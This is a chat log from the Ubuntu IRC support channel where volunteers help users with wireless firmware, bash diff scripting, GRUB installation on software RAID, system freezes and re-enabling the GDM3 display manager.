[00:06] agio: installing to persistent storage will not only provide persistence, so you can keep configuration changes (such as workarounds to this issue) across reboots, it also provides notably better performance than the live install. plus you get a fully (security) patched system (the live install is only patched when it is released, not afterwards unless you install patches manually, but this wont work for kernel patches). [00:07] agio: you see there are several good reasons to use a persistent installation, whereas i see very few to none for using the live install generally. [00:07] If I wanted to upgrade the the chipset firmware for my laptop's PCI connected wireless device - how would I do that ? I can't `aptitude install ' can I? [00:08] really the only reason i can think of is testing things, but you said you're using it for many days or a month now? i asked before why you do this, you did not answer, so i won't (directly) ask again. === mkv is now known as m4v [00:10] tomreyn: ah yes, I remember you asking - you said maybe you could suggest a better way of achieving what I was trying to do rather than a live USB. sorry I didn't fully answer. [00:10] agio: there is the linux-firmware package which provides firmware for many devices (i have not checked whether it provides firmware for yours, yet). it gets updates occasionally. if you want even newer firmware or firmware that is not available in this package, you'll need to manually find it somehow and place it somewhere in /lib/firmware [00:11] agio: no problem. i assumed you had privacy related reasons not to discuss it. [00:12] but if that were the case i'd rather run TAILS or similar. === compdoc_ is now known as compdoc [00:14] tomreyn: the basic reason I am using the live USB is that I am just trying to test stuff. e.g. laptop timeout settings e.g. how long it waits till it suspends. also getting versions of the software I want right before I actually commit to an install. because its harder to change then. e.g the lastest firefox doesn't support the plugins im used to etc. The live USB lets me try stuff. revert to the older [00:14] version etc [00:17] tomreyn: no, no privacy reasons. only reason I didn't answer your question earlier was I got a bit sidetracked trying to get my syslog off the broken computer and up to a pastebin! [00:23] tomreyn: I see on the broken laptop there is a new version of the linux-firmware listed in its apt-cache - its on 1.157.11 and there is a 1.157.17 available? is firmware typically the cause of network manager/wifi problems? [00:24] agio: i see. well if you want a way to quickly reset things then you should use either snapshotting (a very handy feature LVM2 supports), a versioning system (such as git) or a rapid software deployment solution such as docker. wroking within a full VM with virtualbox and its snapshotting mechanism is also an option. [00:24] the latter is probably the most easy to grasp approach in case you're not into the others, yet. [00:25] agio: "is firmware typically the cause of network manager/wifi problems?" - > not neccessarily, but it can well be (i think it often is, but then there can also be bugs, regressions etc.). [00:26] when you say "snapshotting" is that kind of like saving a "clone" of the hard disk - and then re-copying the clone/snapshot to "re-install" ? [00:27] agio: it is my impression that the wireless chipset you have there was never really well supported. there are others which work better and provide more features and performance. [00:27] but im stuck with that wireless chipset right? [00:27] unless I get another computer? [00:27] unless oyu acquire a different one, i guess so. [00:27] you can always attach one via usb [00:28] or if the casing allows for it, replace the wireless module [00:28] hmmm. interesting.. [00:29] when i said "snapshotting" i was referring to 'freezing' a complete file systems' state, and keeping this state while continuing to work based on it and possible create further snapshots as you go. [00:29] this way you can create a timeline and always goback to a certain point where you created a snapshot. [00:30] kind of like a git history? [00:30] kind of, yes. [00:31] since you seem to have come across git, you could also use this to preserve states of configuration files. such as those of firefox. [00:31] the problem with that is when I change something - and I didn't know it at the time but it broke something else - how do I get back to the good state ? I dont know which snapshot to use? === mkv is now known as m4v [00:33] I mean the problem with snapshots/disk imaging/cloning/ or containers is they can capture the bad/misconfigured/hacked stuff [00:34] or versions of software that you can't uninstall or downgrade [00:34] yes you could revert back to a snapshot of a month ago - but then you lose too much work/state etc [00:35] agio: so take snapshots regularly (and delete outdated ones regularly). [00:35] agio: and before you revert you can backup any data you still need. you can also store all your data in a different location that the configuration, in fact you should. [00:35] my current approach is I use ansible and shell scripts to install and configure new machines - and then manage things like say firefox configs etc mostly from within the ansible git repository [00:36] not the actual reason i'm here, but is there an easy way to figure out how a 2gbinstall managed take up a 32gb drive? [00:36] agio: just for yourself? doh, you are the most structured person i know of, i guess. [00:38] tomreyn: I re-use alot of the ansible/install scripts between my ubuntu laptop and ubuntu servers I manage - its a big advantage of ubuntu in my experience [00:38] agio: i guess ansible is great when it comes to deploying systems for the first time, but it's not as great when you want to apply specific configurations (or configuration changes) to an existing system. i prefer puppet for this. [00:39] others would say salt stack, chef etc. [00:41] so you mean like it you wanted to apply a variation to a system config? Im pretty new to ansible - mostly used shell scripts in the past - but at least compared to shell scripts ansible works for me for re-applying configs to an existing machine [00:41] Deetster: depends a bit on how you partitioned and which file systems you created there and where you mount them to. lsblk and "df -h" should hint on this. and then there is "du -schx /*" and "du -schx /var/*" etc to get a better idea of where the data is in use. [00:42] Deetster: or install baobab for a graphical / GUI take on this [00:43] agio: re-applying the same configuration generally, yes. but for making fine-grained changes / merging etc. i think puppet is better. [00:45] agio: you must have a software developer background or similar, since you ar einto git and a little into ansible and deployment in general, but have not considered to replace your wireless module (something a system administrator or hardware person would probably have considered). [00:46] tomreyn: cool. I should take a look at puppet. yeah, Im a web develper mostly - not systems /hardware. when I gave you the [nnnn:nnnn] number output from the `lspci -nn' command earlier did you do a lookup to find out about the chipset and history of bugs etc. I would be interested to know which service/site you used? [00:49] agio: it is called "web search". many people would say "google", ;-) [00:50] you just put these ids in quotation marks, add "linux" and there you go [00:51] some long term system administration background or a certain understanding of how the kernel, kernel modules and the common user space software play together helps a lot, though. [00:51] (in dissecting the information) [00:52] tomreyn: lol, fair enough. I thought there may have been some feature on launchpad bug tracker or ubuntu web search or something [00:53] tomreyn: i'll try that [00:58] agio: i'm not aware of any such features (but it doesn't rule it out). there are databases which resolve these IDs to names. your computer has a copy of those which can be updated using the update-pciids and update-usbids commands. but this doesn't improve the driver support, just the presentation / naming of things in the output produced by utilities such as lspci and lsusb [00:58] tomreyn: in terms of generally stability for the testing of system setups etc - where say you need the system to remain up for say about a week - would you recommend the live USB? I'm finding the live USB is stable enough to last a few days typically - then I run into some issue like this wifi problem - or it doesn't resume from suspend etc. If I make sure all packages are at latest (apt-get dist-upgrade) [00:58] and use the latest installer (e.g. 16.04.5) is it reasonable to use the live USB for what Im doing? or were the live USB's only designed for a quick 45minute tour of the desktop to decide if you like it? and ubuntu dont really expect the live USB's to be any more stable than that? [00:59] what manner of nonsense is this. steam with a single game installed in 20gb? [00:59] the live usb's are really only designed for the quick tour, and to recover your broken persistent installtions. [01:01] agio: ^ for repeatedly bootstrapping a system you'll use for days or weeks i would surely recommend setting up a fully automated deployment mechanism. [01:02] like? [01:04] agio: the easy way to install ubuntu fully automated is called "preseeding" ("preseed") where you boot off the network and have the installer run automatically, setting up the system based on parameters you provided on a configuration file (stored on a different computer on your network). and then you could deply your configurations there using ansible. [01:04] *deplOy [01:04] ...or using git. [01:06] !preseed [01:06] :-/ doesn't exist [01:07] https://help.ubuntu.com/lts/installation-guide/amd64/apbs02.html [01:07] "boot off the network" --> does that mean when I first boot - I enter BIOS custom boot menu and choose "boot from network" ? where does the MBR / partition table/ grubloader etc come from ? I wouldn't have wifi access ? would I need to have ethernet/wired connection to internet? [01:08] https://help.ubuntu.com/lts/installation-guide/amd64/apb.html [01:10] agio: right, you'd set your bios / uefi to "boot from network" and set up a "tftp" server (a very simple ftp-like server) on another computer in your LAN to host the installer kernel and the preseed configuration file, as well as a little dhcp server (which assigns ip addresses automatically etc.). those files from the tfpt server are then loaded by the newly booted 'test' system automatically. [01:11] and then it runs the installer fully automated, which only takes a few minutes. [01:11] part of the installation is to write the MBR / install grub. [01:11] ah thats the point of the preseed file? is to provide all that info which normally a full system could get at - but because at this point the system hasn't fully bootstrapped it has to get info from a "special file in the preseed format?" [01:12] tomreyn: that program was great. had no idea that i managed to download that much on steam workshop (mostly because i downloaded it all from a different computer) [01:12] now i'm going to reboot and see if my SD card reader comes back, since it worked before installing steam [01:14] agio: exactly [01:15] agio: here's an example preseed file someone posted here the other day: https://pastebin.com/raw/S2BBwKuH [01:17] well that didn't work. its been too long since i was on ubuntu, i dont remember how to do anything xD [01:17] SD card reader worked the other day, stopped working for no apparent reason. card works in other computers [01:27] hi [01:27] im new to bash scripting [01:28] can anyone guide me on using `diff -u` on two files, why i see some lines without `+` or `-` meaning they are present in both the files [01:29] any help would be appreciated [01:31] zeus__: yes, lines starting without + or - are just shown to provide context. they are the same in both files. [01:32] is there a way i can remove them from the output [01:33] zeus__: you could grep just the lines starting with + or -, or you could just use diff without -u [01:34] oh yes, i didnt thought about grep. thanks alot [01:35] to filter the output through grep, you would add something along the lines of: | grep '^[-+]' [01:36] agio: FWIW, i just looked at your kernel log (it's full of errors because of the nature of the live install, many files cannot be written to disk). It contains this line: Loading firmware rtlwifi/rtl8192sefw.bin [01:37] im doing it now [01:37] agio: so that's the firmware your wireless adapter uses. [01:38] this is installed as part of the linux-firmware package [01:39] can i paste a line of code here? [01:39] zeus__: one line yes, many lines, no [01:39] !paste [01:39] For posting multi-line texts into the channel, please use https://paste.ubuntu.com | To post !screenshots use https://imgur.com/ !pastebinit to paste directly from command line | Make sure you give us the URL for your paste - see also the channel topic. [01:40] Dif="$(diff -u "a" "b" | grep '^[-+])" [01:40] unexpected EOF error [01:41] how can i properly grep it and save it to this var [01:42] agio: and here's a bug report which discusses the issue of connection drops for this chipset, and where a newer (?) firmware of unknown origin (?) is provided for it: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1454843/ [01:42] Launchpad bug 1454843 in linux (Ubuntu) "10ec:b723 Realtek RTL8723BE wireless card drops connection" [Medium,Triaged] [01:43] zeus__: Dif="$(diff -u "a" "b" | grep '^[-+]')" [01:43] zeus__: just dont cut off the trailing single quote ;) [01:45] oh im soo noob at this :) [01:45] zeus__: assigning multi-line values to a variable does not always provide the inteded effects, however. you *may* need to dump it to a temporary file and read from it later. [01:46] zeus__: everybody makes those mistakes which is why people who develop software usually use editors which provide syntax coloring, and why mature scripting and programming language provide better error output. [01:48] thats the thing which i love about this community :) Prob the best support [01:49] the lines starting with `+' , and `-' represent the differences not the context. [01:49] for bash, #bash is a lot better, plus they have a better quote db than ubottus. [01:49] agio: correct. [01:52] if [! -z "$DIF" ] Does this mean if the var Dif is empty === handleV3 is now known as handlebar === brainwash_ is now known as brainwash [01:53] what im trying to do is to collect the diff in a variable, and if there is some changes, print the changes [01:54] and overwrite the file with original text ( which was before it getting changed) [01:58] tomreyn: nice find on the kernel log output and bug report - Im just reading it and testing on my laptop now. One thing I do like about all the hardware in this laptop with the wifi problem (lenovo edge) is that I don't need any packages out of restricted -the entire system seems comprised only from main and universe [01:58] echo lines=$(echo $DIF | wc -l)", storing the number of lines returned. then [ $lines -gt 9 ] && echo "there is a difference:"; echo $dif [01:58] zeus__: ^ [02:00] agio: right, except, of course, the binary firmware blobs are effectively unmaintained, since they are proprietary code which (more or less) nobody understands but the company developing the hardware. [02:03] $lines -gt 9 what dies this command do ? [02:03] zeus__: look into inotify / incron if you would like to have the kernel notify (and spawn) your scripts when files change === gr33n7007h is now known as al2o3-cr [02:03] which firmware binaries? out of universe/main? - I thought to be in main/universe the code had to be open source + persmissive licences? [02:04] zeus__: do you have man pages (package "man-db") installed ? if so, run "man test" to learn about -gt [02:04] agio: those in the linux-firmware package. === renatos is now known as infern0s [02:06] tomreyn: but `apt-cache policy linux-firmware' shows linux-firmware comes out of main - thats supported open source right? [02:06] agio: i dont think the code in main/universe has to always be open source + permissive licences. other distributions handle it this way, ubuntu is maybe not as strict. i am not sure about the exact policies there. [02:07] i didnt knew about it, theres alot of good info, thanks alot :0 [02:09] I think thats what restricted is for - yes ubuntu will "comprimise" and enable installs of non-free software as part of the default OS config - but only hardware drivers and only if there is no other way a user could install ubuntu [02:12] agio: see the files in /usr/share/doc/linux-firmware/ for details on licensing and copyrights. [02:12] and restricted is supported (to the extent that ubuntu can support closed-source proprietary code ) [02:14] zeus__: there is also "man bash" if you have a couple hours ;) [02:17] huh, Im reading /usr/share/doc/linux-firmware/LICNECE.realtek firmware.txt - and it does seem it only allows redistributing binaries only? and no reverse engineering etc - thats totatlly not free - why isn't it in restricted or multiverse? === Israphel is now known as Guest94452 [02:19] i do not know the exact policies which apply to the sections (main, universe, multiverse). the only distinction i know is about security support. 'main' gets full security support by the ubuntu secrutiy team. === Israphel_ is now known as Israphel [02:23] yeah, I think main does - for sure - get security support - so does restricted (but it must surely be limited) and so does canonical partners - but again that must surely be limited as "partners" is closed-source propritary code [02:31] i would be interested in how other people would explain it. that it is in main strikes me as wrong, too, and that's why i brought it up initially. i do, however, acknowledge the (sad) reality that a lot of hardware devices require those blobs to work properly. including our cpus. and i do appreciate the fact that getting things to work is easy with ubuntu. [02:38] [ $lines -gt 9 ] && echo "theres a dif"; this line the echo doesnt seem to work [02:39] zeus__: i think i mean -gt 0 [02:39] not -gt 9 [02:42] ok [02:44] zeus__: thinking again, it's possible that you may always have one line of output [02:45] yeah, but isn't that what "restricted" is for? - its the "component" of apt repository for those packages - which we have to just live with as closed - for example - this laptop which Im IRC'ing on - has the intel-microcode package - which I understand is akind of dynamically loaded firmware -"intel-microcode" is in restricted [02:45] ...a minimum of [02:46] it applies on one line of output [02:47] agio: for me, the latest version of intel-microcode is in main, not restricted [02:49] !info intel-microcode [02:49] intel-microcode (source: intel-microcode): Processor microcode firmware for Intel CPUs. In component main, is extra. Version 3.20180312.0~ubuntu17.10.1 (artful), package size 1254 kB, installed size 1757 kB (Only available for i386; amd64; x32) [02:51] Does anyone know what 'grub-install: error: disk `md0' not found' means? [02:51] I've setup raid 1. [02:51] tomreyn: ah same here no that I look at it: the original package in the release "pocket" v 3.20151106.1 was in "restricted" but now version 3.20180108.0 is in "main" weird... [02:53] cuddylier: it means that there is no dask called md0. which is probabyl correct. [02:53] *disk [02:53] cuddylier: what were you running? [02:54] or rather: which command produced this output? [02:54] tomreyn: I ran 'grub-install /dev/sda' [02:54] And grub-install /dev/sdc produces the same output (the two drives in the raid 1 array) [02:57] cuddylier: hmm, that's interesting, i'm not sure what's happening there. can you shouw "lsblk" output? [03:02] cuddylier: also, which ubuntu release is this? [03:02] Just getting the output of that command atm and Ubuntu 16.04 [03:04] 16.04 .0, .1, .2, .3, .4 or .5? [03:04] lsb_release -ds [03:04] 16.04.3 [03:05] then patch the system and try again [03:05] Right now I've just got it in a rescue mode as I couldn't boot it fully due to lack of grub. [03:06] tomreyn: lsblk output: https://pastebin.com/raw/yhbQKfkr === apsknight1 is now known as apsknight [03:07] cuddylier: can you also show: grub-install -v /dev/sda [03:08] tomreyn: https://pastebin.com/raw/hSftd2xS [03:08] cuddylier: and see man grub for possible workarounds such as -s, --skip-fs-probe or even --force (but i would not do this, yet, not sure what it will do to your md0) === marve is now known as Guest32908 [03:12] cuddylier: do you have /boot/grub/device.map ? if so, can i see it? [03:13] Nope, that isn't there. [03:13] cuddylier: because of the way you've laid out the system you need to create a /boot/grub/device.map to help grub-install know where things are [03:14] Is the way I've laid it out special? [03:14] Or what part confuses it? [03:14] cuddylier: run this then try grub-install again: " echo "($(sudo grub-probe -t bios_hints -d /dev/md0)) /dev/md0" | sudo tee -a /boot/grub/device.map " [03:15] TJ-: grub-probe: error: disk `md0' not found. [03:15] () /dev/md0 [03:16] cuddylier: it's currently mounted isn't it? [03:16] Yes [03:16] /dev/md0 472M 53M 395M 12% /boot [03:16] cuddylier: does "cat /proc/mdstat" confirm that? [03:16] TJ-: echo "($(sudo grub-probe -t bios_hints -d /dev/md0)) /dev/md0" | sudo tee -a /boot/grub/device.map [03:16] oops [03:16] TJ-: https://pastebin.com/raw/z8GRete3 [03:17] are you running grub-install from within a chroot on /dev/md1 ? [03:17] yeah [03:17] cuddylier: did you (bind) mount devfs into the chroot ? [03:18] TJ-: I did: mount -o bind /dev /mnt/linux/dev [03:18] https://pastebin.com/raw/bGyW0PDd [03:18] cuddylier: OK, so from inside the chroot there should be block nodes /dev/md0 and /dev/md1 [03:19] How do I check that? [03:19] cuddylier: this isn't correct: "mount /dev/sda2 /mnt/linux" [03:19] ls -l # :) [03:19] cuddylier: your lsblk shows " └─md1 9:1 0 476.3G 0 raid1 /" [03:19] oops, I forgot to say I replaced with: mount /dev/md1 /mnt/linux [03:20] so it should have been "mount /dev/md1 /mnt/linux" [03:20] cuddylier: trying to catch us out huh? :D [03:20] yeah, I did that, sorry for the confusion :P [03:20] hehehe [03:20] in case you won't find a solution this ooold bug report suggests that mdadm is not installed: https://bugs.launchpad.net/ubuntu/+source/grub-installer/+bug/1315344 [03:20] Launchpad bug 1315344 in grub-installer (Ubuntu) "Grub install failed on disks with software RAID" [Undecided,Confirmed] [03:22] Yes, and my recent one where I've got the device.map workaround and am working on a permanent GRUB source fix: bug #1756517 [03:22] bug 1756517 in grub2 (Ubuntu) "grub-install: error: diskfilter writes are not supported" [Low,Triaged] https://launchpad.net/bugs/1756517 [03:23] cuddylier: the fact grub-probe is failing is key to this, and it not finding the dev node is very wrong [03:23] hmm :( [03:25] cuddylier: which meta-data version is md0 using? [03:25] TJ-: How do I check? [03:25] cuddylier: "mdadm --examine /dev/sda2" [03:26] cuddylier: 2nd line should show "Version: ...." [03:27] now that you ran "mdadm --examnine", grub-install /dev/sda should work [03:27] Seems like the mdadm package is in deed not installed [03:27] :) [03:27] And I can't actually get apt-get to work on this chroot [03:28] how so? [03:28] sources.list is messed up with what my PXE boot put it in it [03:28] cuddylier: exit the chroot then do "mount --bind /etc/resolv.conf /mnt/linux/etc/resolv.conf" then "chroot /mnt/linux" and try apt again [03:29] resolv.conf was an issue but I fixed that [03:29] mdadm must be available somewhere it was used to assemble the 2 arrays [03:29] The vim installed on Ubuntu 16.04 is very confusing to use :( [03:29] why would your pxe boot mess with what's in /mnt/linux ? [03:29] cat /proc/mdstat works fine yeah [03:29] is that done from outside the chroot? [03:30] I did cat /proc/mdstat inside [03:30] cuddylier: right, but the tool that assembles arrays, called by udev, is mdadm [03:32] it's a bit of a weird arrangement. I'd have made /dev/sda + /dev/sdc = /dev/md0, then partitioned it and but the root-fs and /boot/ in 2 partitions that way [03:32] i would still expect /mnt/linux/etc/apt/sources.list to be unmodified by the PXE boot [03:32] tomreyn: agreed, and if the root-fs which requires md has no mdadm then something is broken [03:33] maybe the initrd was not generated there but copied, and mdadm was never installed there. [03:34] possibly [03:35] thing is though /boot/ is not required to mount the root-fs so the initrd mdadm /conf/mdadm.conf wouldn't usually have an entry for /dev/md0 - that would be left for the real init system to do [03:36] hmmm. well i'm sure cuddylier will let us know once he finds out. [03:37] Yeah, I'm going to try installing with /dev/sda and /dev/sdb to see if that makes a difference. [03:37] sdb is the USB isn't it? [03:37] oh, no, I misread [03:38] yes, sda + sdb looks more sensible since they're the same size [03:39] and I'd suggest build the array directly from sda + sdb, then partition the resulting md0 and adding your file-systems there [03:39] As in just have a single raid array? [03:39] And not a separate /boot one? [03:40] That way the grub-probe workaround I gave will work (from Bug #1756517) [03:40] bug 1756517 in grub2 (Ubuntu) "grub-install: error: diskfilter writes are not supported" [Low,Triaged] https://launchpad.net/bugs/1756517 [03:40] cuddylier: yes, you only need to RAID the physical disks [03:40] hello [03:40] and bye [03:41] just testing [03:41] cuddylier: makes it much easier to deal with since you've already shown you want booth root-fs and /boot/ protected anyhow [03:42] I'm going to try sleeping (without /dev/sda and /dev/sdb) to see if that makes a difference. [03:42] even when theres no difference why it finds empty white space, and says theres a difference and thats an empty line [03:43] sorry zeus__, it's too late here, maybe ask in #bash, goo dluck [03:44] ok good night [03:47] zeus__: you say you're trying to revert changes to file A based on an original file B ? [04:06] Hello [04:06] does somebody use Cheese here? [04:18] hi [04:28] hi [04:28] !hello [04:28] hello [04:29] what issue? [04:29] exit [04:29] man [04:31] Hello. I have Kubuntu 17.10 installed on my Dell 7559 with dual graphics. If secure boot is DISABLED, the laptop refuses to boot. I'm using Intel graphics with proprietary nvidia drivers [04:35] hi I'm setting up a new server with 16.04 LTS. This is a fresh install, was looking for some recommendations on how to configure the drive layout. I have a 256gb ssd to boot (did 8gb swap and rest for /) and I 5x3.7tb sshd and 4x1tb ssd. [04:36] !patience [04:36] Don't feel ignored and repeat your question quickly; if nobody knows your answer, nobody will answer you. While you wait, try searching https://help.ubuntu.com or https://ubuntuforums.org or https://askubuntu.com/ [04:36] wanted to make the SSDs a single drive for a database. and use the sshd's for storage as a single drive. on board controller no hardware raid. [04:37] does anyone have an opinion on best practices/file system of choice? === deathonater is now known as Smeef [04:54] Hi, how going beta of ubuntu? [04:54] shuforov: 18.04? [04:54] yes [04:55] http://cdimage.ubuntu.com/daily-live/current/HEADER.html [04:55] oh no, beaver beta [04:55] ? [04:55] damm sory [04:55] my mistake [04:56] still sleeping just wake up. [04:56] thenx for link energizer [04:56] shuforov: https://wiki.ubuntu.com/BionicBeaver/ReleaseSchedule [04:57] energizer, yes i monitoring this link :) cant wait to update to it from 16 lts === BartolomeBellid is now known as BartolomeBellid1 === BartolomeBellid1 is now known as BartolomeBellid0 [05:02] hi === marve is now known as Guest21656 [05:19] If I install ubuntu onto a USB drive, can I boot from it on any machine? [05:22] no [05:22] Hi, does anyone know how long it takes a ghost nick to be free? [05:22] solarradiation, if the machine is a different arquitecture it wont work [05:22] my ubuntu system keeps freezing [05:23] solarradiation, theres also the drivers, which matter. [05:24] tty wise, its possible, but with Xorg, its a bit harder [05:24] BartolomeBellid0, ask in #freenode [05:25] AntiSlayer, try cleaning the RAM, if that's not it check the disk drive [05:25] how [05:25] is there a program to clean ram [05:25] AntiSlayer, if the disk drive is not wrong, try upgrading to latest stable [05:25] AntiSlayer, ... no [05:25] Kumool, thanks, i try this :) [05:26] AntiSlayer, RAM is a physical device in the computer itself, if it gets dusty inside, you're gonna have hiccups and freezes [05:26] how to upgrade to latest stable [05:26] oh okay [05:26] AntiSlayer, what computer do you have? [05:26] ubuntu 16.04 and it is an hp 15 f272wm [05:27] it could also freeze if the cpu gets hot [05:28] how do i upgrade to the latest stable thingy [05:28] mm [05:28] it seems brand new so i doubt its anything physical [05:29] have you noted when it freezes [05:29] a pattern === BartolomeBellid0 is now known as BartolomeBellid1 [05:29] yeah i was doing a bunch of stuff and then it froze while i was working on the computer then i had to cold boot it [05:30] mmm [05:30] was it hot? [05:30] no [05:30] i feel no heat from it [05:31] did you install ubuntu? [05:31] yes [05:31] ubuntu 16.04 lts [05:32] desktop [05:34] you're better off looking for a guide online on upgrading to 17.10 (this was the first hit https://askubuntu.com/questions/909323/ubuntu-gnome-17-04-ubuntu-17-10-upgrade) [05:34] check the answers section [05:34] kk thank you for your time [05:35] sorry, couldnt be of more help :S [05:35] i'd suggest you install a hardware sensor [05:35] its alright have a wonderful day and happy easter [05:35] okay [05:35] oh, you too [05:38] oh, i'm also getting freezes too antisl... oh, gone :( [05:38] hello [05:40] hello ShriHari === BartolomeBellid1 is now known as BartolomeBellid === BartolomeBellid is now known as Tuxer === Tuxer is now known as BartolomeBellid [06:17] I disabled my display manager using systemctl and now whenever I reboot, I don't get a graphical display unless I start it manually. When I run "sudo systemctl enable gdm3", I get an error saying that it failed, citing that the unit files have no installation config. What is the proper way to enable a display manager in Ubuntu? It's obviously not the same way it is with most distros I've tried. [06:17] Which is the systemd method. [06:18] Would be great if someone could help, because I'm not reinstalling Ubuntu, and I don't want to manually start my display manager every time I boot. thx [06:30] what is a UI freeze? [06:30] UI = User Interface I am guessing. [06:30] yes..and? [06:31] Freeze = stops reacting. [06:31] | All hail our UI freeze on MARCH TWENTY-TWOTH [06:31] so that was a finalization? [06:31] When can I get 18.04 stable? [06:32] that's what I came here to ask [06:32] funny nick IGot2P [06:35] am reading https://itsfoss.com/ubuntu-18-04-release-features/ [06:37] 26th April: Stable Ubuntu 18.04 LTS release -- Let me look. Maybe that is in the topic already. [06:38] MODS PUT The date in the Topic, That is my suggestion. That is all. [06:46] !pastebin [06:46] For posting multi-line texts into the channel, please use https://paste.ubuntu.com | To post !screenshots use https://imgur.com/ !pastebinit to paste directly from command line | Make sure you give us the URL for your paste - see also the channel topic. [06:51] For anybody who needs to see what it reads exactly, here's what I get: https://paste.ubuntu.com/p/N5kn6N7Rsd/ [06:53] I tried googling my problem, and the only solution I find to enabling a display manager is here: https://askubuntu.com/questions/19320/how-to-enable-or-disable-services#19324 [06:55] k12: i just joined, do you want to install a desktop envorinment? [06:55] lotuspsychje: no, trying to re enable my display manager. [06:55] Installed Ubuntu 16.04.4 and installation took forever... eventually go to the point where I say yes to reboot into OS and I get this message, "MODSIGN: Couldn't get UEFI db list " and the computer had frozen and refuses to restart. Any ideas so as not to corrupt installation please? [06:56] But I see something for permanently reenabling it, and odly enough I didn't see it there, because I'm dumb. Going to give it a shot. [06:56] k12: display manager comes with the DE? [06:57] brb [06:57] Ascavasaion: are you singlebooting ubuntu? [06:58] singlebooting? As in Ubuntu is the only OS to boot? then yes., [06:59] Ascavasaion: ok, have you disabled secureboot & fastboot? [06:59] lotuspsychje: secureboot I do not know. I have disabled fastboot though. [06:59] Hi there im having a lot of issues with My Nvidia drivers can anyone help? [07:00] Im on a laptop if that helps at all. [07:00] !details | Willzor [07:00] Willzor: Please elaborate; your question or issue may not seem clear or detailed enough for people to help you. Please give more detailed information; for example, we might need errors, steps, relevant configuration files, Ubuntu version, and hardware information. Use a !pastebin to avoid flooding the channel. [07:01] Ascavasaion: try legacy in your uefi settings [07:01] I have all the drivers installed for prime but when i load the server up i dont get anything [07:01] Willzor: are you on untu server? [07:01] lotuspsychje: but I am in the installation and it is trying to reboot for the first time and froze. [07:02] Im not on the server no [07:02] Willzor: wich nvidia driver are you using? [07:02] The Nvidia X server Settings [07:02] And 390 [07:02] Willzor: and on wich ubuntu version? [07:03] You mean the Kernal? [07:03] morning EriC^^ [07:03] morning lotuspsychje [07:03] Willzor: no i mean ubuntu version [07:04] Hmm how would i find that? [07:04] lsb_release -a Willzor [07:04] No LSB modules are available. Distributor ID: MakuluLinux Description: MakuluLinux 14 LinDoz Release: 14 Codename: LinDoz [07:05] Willzor: we only support ubuntu here mate [07:05] It is [07:05] Its Ubuntu [07:06] Willzor: we only support vanilla ubuntu & their flavors here [07:06] Its all of the Ubuntu things just with a few added icons and what not [07:07] Willzor: we only support official ubuntu & its flavors here [07:07] lotuspsychje: it's GDM3 which comes with the gnome desktop environment. [07:07] So your not willing to help me out even tho im saying its the same thing? [07:07] Like really the same thing just a few added icons and you want to say screw you/ [07:07] Willzor: its not that i dont want, we cant help unofficial ubuntu distro's here [07:08] Right and saying you dont want to help and saying what you said isnt the same thing? [07:08] Willzor: for your distro, seek help on their official web/irc [07:08] !based on ubuntu | Willzor === fatty is now known as stibium [07:08] Willzor: The Ubuntu channels can only provide support for Ubuntu and its official flavors, since other distributions and derivatives have repository and software changes. So please use their dedicated support venues, for example: Linux Mint (#linuxmint-help on irc.spotchat.org), Kali Linux (#kali-linux), and LXLE (#lxle) [07:08] Letting someone hand like that isnt cool [07:09] They dont have an irc that i can see [07:09] Willzor: if you like ubuntu support, choose an official ubuntu flavor and youl get help here [07:09] Willzor: lotus is right, it's not supported here. you need to use their support forums. [07:09] Ok and they dont have one that i can find? [07:09] Even tho everything on this OS is Ubuntu but you cant help? [07:09] What sense does that make? [07:10] Willzor: understand your distro is NOT ubuntu [07:10] i'm sure there is something listed on their website. [07:10] Im sure there isnt [07:11] Ive looked [07:11] Willzor: you agree, you are the one that choose your Os? [07:12] Ascavasaion: paste that error to EriC^^ he might have a clue on that uefi issue [07:12] And you agree i came to an IRC for UBUNTU knowing thats what the back end is on this but yet you dont want to help? [07:12] Willzor: again, its not me that doesnt wanna help, we have rules here..if you dont agree the !guidelines, please ask in #ubuntu-ops please [07:13] Willzor: we don't know what changes have been made from plain ubuntu, so we don't even attempt to support it to avoid mistakes. [07:14] All im having is issues with my video drivers thats it, ive tried everything i could think of [07:14] Willzor: install ubuntu and you might have a much better driver experience [07:15] I just like the UI i dont know how to make normal Ubuntu look and feel like this one does [07:15] Willzor: install ubuntu and we will help you tweak your theme [07:16] So... after following that link, the sudo tee method was a failure, and so was the update-rc.d. I will not be restoring the display-manager by installing more unwanted packages. [07:16] To almost look like this one? i dont know how thats possible [07:17] Willzor: what does it look like? [07:17] https://www.makululinux.com/wp/lindoz/ [07:17] It's starting to look like it's impossible to enable display managers, only disable them. === Budgii_ is now known as Budgii [07:18] Willzor: we have ubuntu users that experimenten with cinnamon before.. [07:19] So you can get the icons and start menu to look like that? [07:19] k12: you havent explained yet what and how you trying to do? [07:20] Willzor: i dont see why you cant make ubuntu look like cinnamon or lindoz with themes [07:20] lotuspsychje: I'm trying to enable gdm3. [07:20] I've searched for an hour by now for the solution to my problem, and nothing is appearing. [07:20] k12: gdm is installed by default when you install a destop envoriment [07:20] k12: dont you have a DE installed? [07:20] Yes, and then I switched from gdm3 to lightdm. [07:20] That start menu is very custom thats one of the reasons i picked it [07:21] k12: explain first [07:21] Then lightdm got screwed up, and so I disabled the display manager and then that's when all this crap started becoming a problem. [07:21] Is there anyway to fork it per say to work correctly once i move over? [07:21] k12: lets start from the start: ubuntu version please? [07:21] someone says to try dpkg-reconfigure gdm, I'm going to try that, and hopefully it works. [07:21] 17.10 [07:22] k12: gdm3 is installed by default on 17.10 [07:22] Willzor: forking lindoz Os to ubuntu? [07:23] Yea [07:23] Willzor: their support seems to be here - https://www.makululinux.com/wp/forums/ [07:23] Willzor: you dont fork an Os just to make it look like you want [07:23] No one responds there. [07:23] I just said that I switched from gdm3 to lightdm, and then I messed that up while trying to do some configuring. Lightdm started repeatedly and repeatedly starting over and over again, because it sucks, and then I had to reboot and go into my ubuntu Live USB, and disabled the display manager.service. [07:23] Thats a dead forum [07:23] That's when all this started. [07:24] k12: why did you install lightdm when you had gdm for start? [07:24] Because I liked how I could customize lightdm's gtk greeter, or choose other greeters like webkit or kde. [07:25] k12: then keep using 16.04 lts? [07:25] -_- [07:25] k12: if i was you i would reinstall clean [07:25] k12: or the hard way: fix broken packages from recoverymode? [07:25] Where do i find ubuntu cinnamon? [07:26] Yeah, no. I shouldn't have to reinstall, I should be allowed to enable/disable display managers using systemctl like I can on debian, fedora, arch, or any other distro. But fsr it's only ubuntu where this is such a problem. [07:26] Willzor: cinnamon isnt installed by default on ubuntu flavors [07:26] Anyway, going to try that dpkg solution. If that fails, I give up. [07:27] !info cinnamon | Willzor 